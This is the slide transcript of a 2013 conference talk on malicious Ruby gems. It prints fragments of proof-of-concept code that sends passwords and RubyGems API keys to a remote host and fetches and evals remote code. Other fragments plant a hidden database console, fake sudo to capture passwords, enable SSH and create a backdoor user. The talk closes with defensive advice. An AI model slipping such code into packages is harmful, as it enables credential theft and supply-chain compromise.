Hacking with Gems (RubyNation 2013)

Hacking with Gems (RubyNation 2013)

6d48d3849102b57bbc1462c0da0b3866?s=128

Benjamin Smith

June 15, 2013
Tweet

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith Monday, June 17, 13

  2. How-to get rich quick and (maybe) not go to jail!

    Monday, June 17, 13
  3. Ben Smith cannot be held accountable for anything that will

    happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer. Monday, June 17, 13
  4. who i am Monday, June 17, 13

  5. Monday, June 17, 13

  6. Monday, June 17, 13

  7. Monday, June 17, 13

  8. what i am NOT Monday, June 17, 13

  9. Monday, June 17, 13

  10. please do not try this at home Monday, June 17,

    13
  11. please do not try this at home Monday, June 17,

    13
  12. Monday, June 17, 13

  13. Monday, June 17, 13

  14. Lawful Evil Lawful Good Monday, June 17, 13

  15. Lawful Evil Lawful Good Monday, June 17, 13

  16. Lawful Evil Lawful Good Monday, June 17, 13

  17. Lawful Evil Lawful Good Monday, June 17, 13

  18. once upon a time Monday, June 17, 13

  19. GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail

    (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Monday, June 17, 13
  20. what’s the worst that could happen? Monday, June 17, 13

  21. Monday, June 17, 13

  22. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  23. before... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  24. after! github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  25. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  26. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

    Monday, June 17, 13
  27. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

    Monday, June 17, 13
  28. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  29. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  30. “development.log” ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17,

    13
  31. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  32. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit Monday, June 17, 13
  33. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: Monday, June 17, 13
  34. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Monday, June 17, 13
  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Monday, June 17, 13
  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Monday, June 17, 13
  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Monday, June 17, 13
  38. a one way ticket to Monday, June 17, 13

  39. that was easy. what else can I do? Monday, June

    17, 13
  40. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

  41. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  42. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  45. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

    Monday, June 17, 13
  46. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Monday, June 17, 13
  50. /users/sign_in github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

  51. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

  52. hello db access! github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

  53. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector Monday, June 17, 13

  54. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector Monday, June 17,

    13
  55. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector Monday, June 17,

    13
  56. careful of wolves in sheep’s clothing Monday, June 17, 13

  57. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5: Monday, June 17, 13
  58. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5: Monday, June 17, 13
  59. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Monday, June 17, 13
  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Monday, June 17, 13
  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Monday, June 17, 13
  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Monday, June 17, 13
  63. i like the beach Monday, June 17, 13

  64. that was easy. what else can I do? Monday, June

    17, 13
  65. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

  66. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13
  67. Monday, June 17, 13

  68. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s Monday,

    June 17, 13
  69. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13
  70. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13
  71. what what github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

  72. i can haz source github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13

  73. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Monday, June 17, 13
  74. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Monday, June 17, 13
  75. that was easy hard. what else can I do? (that's

    easier) Monday, June 17, 13
  76. gem install be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  77. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  78. what it ACTUALLY does github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  79. github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  80. file tree looks ok github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  81. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

    Monday, June 17, 13
  82. but what was this? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  83. I see no C github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  84. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  85. there is no Rakefile github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  86. the real file tree github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  87. the real file tree github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  88. what does the Rakefile do? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  89. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

    Monday, June 17, 13
  90. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy Monday,

    June 17, 13
  91. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  92. what does "sudo" do now? github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  93. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  94. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  97. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy Monday,

    June 17, 13
  98. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  99. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy Monday, June

    17, 13
  100. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  101. take away: don't install ben's gems Monday, June 17, 13

  102. Monday, June 17, 13

  103. how could I get you to install my gems? Monday,

    June 17, 13
  104. what gems are trustworthy? Monday, June 17, 13

  105. how can I add my code to already trusted gems?

    Monday, June 17, 13
  106. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  107. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13
  108. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13
  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Monday, June 17, 13
  110. now I own your gems github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  111. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  112. do people trust your gems? Monday, June 17, 13

  113. do people who install your gems have trustworthy gems? Monday,

    June 17, 13
  114. Monday, June 17, 13

  115. there’s still one problem Monday, June 17, 13

  116. bootstrapping Monday, June 17, 13

  117. being popular sucks Monday, June 17, 13

  118. conferences Monday, June 17, 13

  119. RubyJS Monday, June 17, 13

  120. websocket Monday, June 17, 13

  121. brakeman Monday, June 17, 13

  122. rom Monday, June 17, 13

  123. Monday, June 17, 13

  124. Monday, June 17, 13

  125. Monday, June 17, 13

  126. [censored] Monday, June 17, 13

  127. so what happens now? Monday, June 17, 13

  128. ruby gems goes down Monday, June 17, 13

  129. heroku deploys go down Monday, June 17, 13

  130. i go to the beach Monday, June 17, 13

  131. ruby gems goes down Monday, June 17, 13

  132. heroku deploys go down Monday, June 17, 13

  133. recovery Monday, June 17, 13

  134. so what now? Monday, June 17, 13

  135. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Monday, June 17, 13

  136. Little Snitch obdev.at/products/littlesnitch/index.html Monday, June 17, 13

  137. gem install be_truthy github.com/benjaminleesmith/be_truthy Monday, June 17, 13

  138. fseventer fernlightning.com/doku.php?id=software:fseventer:start Monday, June 17, 13

  139. don’t “gem install” from strangers Monday, June 17, 13

  140. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Monday, June 17, 13
  141. Monday, June 17, 13

  142. Monday, June 17, 13

  143. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby Monday,

    June 17, 13
  144. gem install rails -P HighSecurity Monday, June 17, 13

  145. > gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

    While executing gem ... (Gem::Exception) Unsigned gem Monday, June 17, 13
  146. gem cert --build Monday, June 17, 13

  147. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust Monday, June 17, 13

  148. sandboxing Monday, June 17, 13

  149. github.com/rubygems/rubygems Monday, June 17, 13

  150. tools to detect malicious code Monday, June 17, 13

  151. private gem repos Monday, June 17, 13

  152. do not try this at home Monday, June 17, 13

  153. don't install gems you don't need to Monday, June 17,

    13
  154. pay attention to what your gems do Monday, June 17,

    13
  155. monitor your system Monday, June 17, 13

  156. read the source Monday, June 17, 13

  157. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

  158. on install github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

  159. the results github.com/benjaminleesmith/coal-mine-canary Monday, June 17, 13

  160. thank you! Monday, June 17, 13

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13

  162. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13

  163. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Monday, June 17, 13